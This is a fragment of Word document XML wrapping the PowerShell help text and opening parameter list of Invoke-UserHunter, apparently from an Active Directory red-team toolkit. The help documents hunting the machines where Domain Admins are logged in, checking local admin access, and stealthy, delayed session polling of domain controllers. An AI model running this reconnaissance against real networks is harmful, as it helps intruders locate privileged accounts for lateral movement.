    <w:p w14:paraId="4C3CAEBD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4F08540A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8CD323" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6E8C8E79" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain for query for machines, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2142B0F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="168BDB0F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5F9470" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="03CE32D4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1880B3F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1C844F51" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ShowAll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE38855" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="25F1D74F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Return all user location results, i.e. Invoke-UserView functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DDAE8A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="587DD0DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SearchForest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC22A89" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4CE6C6D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Search all domains in the forest for target users instead of just</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C666CA3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        a single domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106276D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2C75F6D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Stealth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448B5CB0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="316FA9D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Only enumerate sessions from connonly used target servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D2CDFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6934F737" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER StealthSource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFCDB70" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="127B2517" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The source of target servers to use, 'DFS' (distributed file servers),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194AAF30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        'DC' (domain controllers), 'File' (file servers), or 'All'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612F7105" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="740FA993" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ForeignUsers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E967AA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="703A9097" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Only return results that are not part of searched domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C9D4AA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="06F02F24" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .PARAMETER Threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474D2017" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="74D4EC0B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The maximum concurrent threads to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27704C19" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1A24165A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Poll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757A482B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6F2F92C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Continuously poll for sessions for the given duration. Automatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1ED18F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        sets Threads to the number of computers being polled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5A18C4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1774EB6D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B786E5D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="562EE7B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Invoke-UserHunter -CheckAccess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607C09C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="118F2CC0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Finds machines on the local domain where domain admins are logged into</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB469FD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        and checks if the current user has local administrator access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7052D723" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="35145DD0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695FD764" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1CD70793" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Invoke-UserHunter -Domain 'testing'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004A49A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3CF753F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Finds machines on the 'testing' domain where domain admins are logged into.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775C3611" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="27931985" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5146DA28" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="262C1E61" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Invoke-UserHunter -Threads 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05962DA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6D624545" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Multi-threaded user hunting, replaces Invoke-UserHunterThreaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E084D97" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4F959EDA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FBFAEB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="12D5EE87" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Invoke-UserHunter -UserFile users.txt -ComputerFile hosts.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342C6CC3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="275545C4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Finds machines in hosts.txt where any members of users.txt are logged in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D622A47" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        or have sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FC9081" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="39406CDF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779D6FD7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6DD87A39" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Invoke-UserHunter -GroupName "Power Users" -Delay 60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D5C4EF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="37F0D1C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Find machines on the domain where members of the "Power Users" groups are</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAC87AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        logged into with a 60 second (+/- *.3) randomized delay between</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DDBD27" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        touching each host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AE820B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5BBFCA05" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B5FC7A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4BA3CC48" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Invoke-UserHunter -TargetServer FILESERVER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E0B893" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7915D81C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Query FILESERVER for useres who are effective local administrators using</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56109BE9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Get-NetLocalGroup -Recurse, and hunt for that user set on the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563A2FA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="11431D18" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BFEC1F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1BD24944" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Invoke-UserHunter -SearchForest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D516DAC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="67E9539F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Find all machines in the current forest where domain admins are logged in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D39E994" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="31C2C568" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181BFD54" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="04D22B21" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        PS C:\&gt; Invoke-UserHunter -Stealth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCD3987" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1524ADC9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Executes old Invoke-StealthUserHunter functionality, enumerating commonly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2BC545" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        used servers and checking just sessions for each.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193BCC53" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="261A40FB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583B92D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="007CD152" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Invoke-UserHunter -Stealth -StealthSource DC -Poll 3600 -Delay 5 -ShowAll | ? { ! $_.UserName.EndsWith('$') }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F76E565" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1F4B2CC9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Poll Domain Controllers in parallel for sessions for an hour, waiting five</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2201D8D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        seconds before querying each DC again and filtering out computer accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE85DF6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5C698680" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5759B810" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        http://blog.harmj0y.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F7164E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1F75AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4AF1F7F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC28636" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A3AA66" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position=0,ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CCCA4C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('Hosts')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7984C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE77E7E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EC6417" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="52C8A8A9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateScript({Test-Path -Path $_ })]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FB4138" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('HostList')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2001FBC7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0724D3A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerFile,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD805F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3C695781" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304EBEFD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerFilter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5801C28E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5691A8D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D06FF1F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007618E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4DA58106" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6153A4BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Unconstrained,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E3B8A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1B2EEDC1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7263C2DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GroupName = 'Domain Admins',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783718CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="74BFA186" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A49A45" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TargetServer,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BF4E5E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7D2E2504" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4F057C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UserName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689249C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4F252824" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F81C68A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UserFilter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AA97B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7B8A28EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E51252C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UserADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0C0CC9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0B5341FB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateScript({Test-Path -Path $_ })]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1416EE30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBC5D29" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UserFile,</w:t>
      </w:r>
    </w:p>
